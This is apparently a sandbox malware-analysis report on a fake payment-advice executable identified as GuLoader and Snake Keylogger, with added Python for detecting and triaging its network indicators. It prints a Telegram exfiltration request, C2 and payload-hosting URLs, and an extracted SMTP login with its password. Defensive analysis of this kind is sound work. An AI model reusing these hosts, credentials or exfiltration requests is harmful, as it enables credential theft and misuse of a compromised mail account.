Windows Analysis Report
PayeeAdvice_HK54912_R0038704_37504.exe

Overview

General Information

Sample name: PayeeAdvice_HK54912_R0038704_37504.exe
Analysis ID: 1559227
MD5: 62134cc34c58682721cb5bd2a9ba3624
SHA1: a650b3507161f8d705b183db6a965307d95625f4
SHA256: 6d7f0587ad61a77009ec4d739d3ffd3f74e0ab8a572913812bef6b8c2b89ea54
Tags: exeuser-lowmal3

Detection

GuLoader, Snake Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
AI detected suspicious sample
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "wajahat@foodex.com.pk", "Password": "wajahat1975", "Host": "mail.foodex.com.pk", "Port": "587", "Version": "4.4"}
Source: PayeeAdvice_HK54912_R0038704_37504.exe ReversingLabs: Detection: 42%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: PayeeAdvice_HK54912_R0038704_37504.exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C487A8 CryptUnprotectData, 2_2_36C487A8
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_36C48EF1 CryptUnprotectData, 2_2_36C48EF1
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.0
Source: unknown HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: PayeeAdvice_HK54912_R0038704_37504.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004065DA FindFirstFileW,FindClose, 0_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_004059A9 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_004059A9
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 0_2_00402868 FindFirstFileW, 0_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_00402868 FindFirstFileW, 2_2_00402868
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004065DA FindFirstFileW,FindClose, 2_2_004065DA
Source: C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe Code function: 2_2_004059A9 DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 2_2_004059A9

Networking

Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.4:49756 -> 37.27.123.72:587
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2020/11/2024%20/%2019:18:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 13.107.43.12 13.107.43.12
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown DNS query: name: checkip.dyndns.org
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 132.226.8.169:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49740 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 188.114.96.3:443
Source: global traffic HTTP traffic detected: GET /y4mO9x8ZxntK8YWdNZ0APFyw4ftQiKEA3b9ah1Wz-M1CglBAT974LE8XumXkuL0QoN-7vR_btDJUwSahkUS2M93xLAAR6xUxBf6NEExd3XZo57-YMEfTx94x1QxOp2a-8hq__KMNGGaakccwQ1sWJGhyaRsLbTLnjBQxVFJ7n1h5l7q4yyhOY91F-AdnfAux6c4nzAxrfVrEgoQU3Nn3oITjw/KwTCIrYgMbvy217.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: 4jjxew.dm.files.1drv.com Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: api.onedrive.com
Source: global traffic DNS traffic detected: DNS query: 4jjxew.dm.files.1drv.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: mail.foodex.com.pk
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Wed, 20 Nov 2024 09:25:49 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
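The DNS and HTTP entries above record the order in which the sample talks to the network: it fetches the payload from a OneDrive share, learns its public IP from checkip.dyndns.org, geolocates that IP via reallyfreegeoip.org, and only then reaches the exfiltration endpoints (api.telegram.org and mail.foodex.com.pk). Any one of those hosts on its own is weak evidence (plenty of legitimate software asks checkip.dyndns.org for its address), but the recon-then-exfil sequence from a single client inside a short window is a usable detection. The following Python is an added example written for this page, not code from the sandbox report or its vendor. It assumes a simple proxy-log layout (ISO timestamp, client IP, destination host, user agent) and a ten-minute window; both are illustration choices, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Indicators taken from the report's DNS/HTTP entries above.
RECON_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}
EXFIL_HOSTS = {"api.telegram.org", "mail.foodex.com.pk"}
# Exact User-Agent the sample sent to checkip.dyndns.org (copied from the report).
SAMPLE_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)"

# Assumed proxy-log layout (illustration only): "<ISO timestamp> <client> <host> <user-agent>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")

# Constructed log lines: client .4 reproduces the report's sequence, client .9 does not.
SAMPLE_LOG = [
    "2024-11-20T09:25:10 192.168.2.4 checkip.dyndns.org " + SAMPLE_UA,
    "2024-11-20T09:25:12 192.168.2.4 reallyfreegeoip.org -",
    "2024-11-20T09:25:49 192.168.2.4 api.telegram.org -",
    "2024-11-20T09:26:00 192.168.2.9 checkip.dyndns.org curl/8.0",
    "2024-11-20T11:00:00 192.168.2.9 api.telegram.org Mozilla/5.0",
]


def parse(line):
    """Return (timestamp, client, host, user_agent) or None for a malformed line."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ts, client, host, ua = m.groups()
    return datetime.fromisoformat(ts), client, host.lower(), ua


def find_exfil_sequences(lines, window=timedelta(minutes=10)):
    """Map client -> (first recon timestamp, exfil host) for every client that
    contacted a recon host and then an exfil host within `window`."""
    by_client = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev:
            by_client[ev[1]].append(ev)
    hits = {}
    for client, events in by_client.items():
        events.sort(key=lambda e: e[0])
        first_recon = None
        for ts, _, host, _ in events:
            if host in RECON_HOSTS and first_recon is None:
                first_recon = ts
            elif host in EXFIL_HOSTS and first_recon is not None and ts - first_recon <= window:
                hits[client] = (first_recon, host)
                break
    return hits


def ua_matches_sample(line):
    """Cheaper single-line check: the report's exact UA sent to checkip.dyndns.org."""
    ev = parse(line)
    return bool(ev) and ev[2] == "checkip.dyndns.org" and ev[3].strip() == SAMPLE_UA


if __name__ == "__main__":
    for client, (ts, host) in find_exfil_sequences(SAMPLE_LOG).items():
        print(f"{client}: recon at {ts.isoformat()} followed by exfil to {host}")
```

Two caveats when running this against real logs: api.telegram.org is reached over TLS, so the destination host has to come from DNS answers, the proxy CONNECT line or the SNI field rather than from an HTTP request line; and the user-agent check only helps for the plaintext checkip.dyndns.org request, since it is the one place the sample's UA is visible on the wire.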
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://foodex.com.pk
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mail.foodex.com.pk
Source: PayeeAdvice_HK54912_R0038704_37504.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.00000000339C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946432969.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/D
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946432969.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/oft
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://4jjxew.dm.files.1drv.com/y4mO9x8ZxntK8YWdNZ0APFyw4ftQiKEA3b9ah1Wz-M1CglBAT974LE8XumXkuL0QoN-
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.0000000003378000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.onedrive.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179387047.00000000033B2000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946432969.00000000033E5000.00000004.00000020.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4179903314.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000003.1946338383.00000000033E5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.onedrive.com/v1.0/shares/s
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20a
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B82000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B73000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033B7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A0E000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A0E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AA5000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A38000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033A7E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034B10000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D41000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AE8000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C3F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D1D000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C45000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C1A000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AA1000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AEB000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034B10000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D41000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033AC9000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AE8000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C3F000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A9B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034D1D000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C45000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C1A000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AA1000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034AEB000.00000004.00000800.00020000.00000000.sdmp, PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034A76000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4202735548.0000000034C8C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: PayeeAdvice_HK54912_R0038704_37504.exe, 00000002.00000002.4201423308.0000000033BAE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/lB
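The memory strings above mix four kinds of URL and it pays to separate them before anything is put on a blocklist: panel/C2 hosts on a non-standard port (the four :8081 entries), the exfiltration channels (the api.telegram.org sendMessage template and the mail.foodex.com.pk SMTP host), the IP and geolocation lookups, the OneDrive share the loader fetched its payload from, and strings that are not indicators at all (the NSIS error URL, Office support links, and search-engine URLs that most likely come from the Chrome profile data the stealer read). The following Python is an added triage example written for this page, not code from the report or the sandbox vendor. The category names and the noise list are my assumptions; the input list is copied from the entries above.

```python
import ipaddress
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Input copied from the "String found in binary or memory" entries above.
STRINGS = [
    "http://51.38.247.67:8081/_send_.php?L",
    "http://aborters.duckdns.org:8081",
    "http://anotherarmy.dns.army:8081",
    "http://checkip.dyndns.org/",
    "http://foodex.com.pk",
    "http://mail.foodex.com.pk",
    "http://nsis.sf.net/NSIS_ErrorError",
    "http://varders.kozow.com:8081",
    "https://4jjxew.dm.files.1drv.com/",
    "https://api.onedrive.com/v1.0/shares/s",
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=",
    "https://reallyfreegeoip.org/xml/",
    "https://reallyfreegeoip.org/xml/8.46.123.75",
    "https://duckduckgo.com/ac/?q=",
    "https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17",
]

# Assumed categories and noise list (my choice, not the report's).
RECON = {"checkip.dyndns.org", "reallyfreegeoip.org"}
HOSTING = ("onedrive.com", "1drv.com")
NOISE = ("nsis.sf.net", "office.com", "google.com", "duckduckgo.com",
         "ecosia.org", "yahoo.com", "schemas.xmlsoap.org")


def _under(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(url):
    """Assign one URL string to a category; order matters (most specific first)."""
    u = urlsplit(url)
    host = (u.hostname or "").lower()
    if not host:
        return "unparsed"
    if host == "api.telegram.org":
        return "telegram_exfil"
    if host in RECON:
        return "victim_recon"
    if _under(host, HOSTING):
        return "payload_hosting"
    if _under(host, NOISE):
        return "noise"
    if u.port not in (None, 80, 443):       # e.g. the :8081 panel hosts
        return "c2_nonstandard_port"
    if host.startswith("mail."):
        return "smtp_exfil"
    return "other"


def triage(strings):
    """Group hosts by category; a bare domain whose 'mail.' child is an SMTP
    exfil host is folded into smtp_exfil."""
    out = defaultdict(set)
    for s in strings:
        cat = classify(s)
        u = urlsplit(s)
        host = (u.hostname or s).lower()
        out[cat].add(f"{host}:{u.port}" if cat == "c2_nonstandard_port" else host)
    parents = {h.split(".", 1)[1] for h in out["smtp_exfil"]}
    for h in list(out["other"]):
        if h in parents:
            out["other"].discard(h)
            out["smtp_exfil"].add(h)
    return {k: sorted(v) for k, v in out.items() if v}


def sandbox_egress_ip(strings):
    """The address the sample passed to reallyfreegeoip.org is the analysis
    machine's public IP, so it must not be treated as an attacker indicator."""
    for s in strings:
        u = urlsplit(s)
        if u.hostname == "reallyfreegeoip.org":
            try:
                return str(ipaddress.ip_address(u.path.rsplit("/", 1)[-1]))
            except ValueError:
                continue
    return None


def telegram_template(strings):
    """Bot token and chat_id from the sendMessage string; both are empty here
    because the memory string is only a format template filled in at runtime."""
    for s in strings:
        u = urlsplit(s)
        if u.hostname == "api.telegram.org" and "/sendMessage" in u.path:
            token = u.path.split("/bot", 1)[1].split("/", 1)[0]
            chat = parse_qs(u.query, keep_blank_values=True).get("chat_id", [""])[0]
            return {"token": token, "chat_id": chat}
    return None
```

Two points the output makes explicit. The Telegram string carries an empty bot token and chat_id, so the real values have to be taken from the extracted malware configuration rather than from this string list. And 8.46.123.75 is the address the sample looked up for the analysis machine itself; blocking it would blacklist the sandbox's own egress, not the attacker.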
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
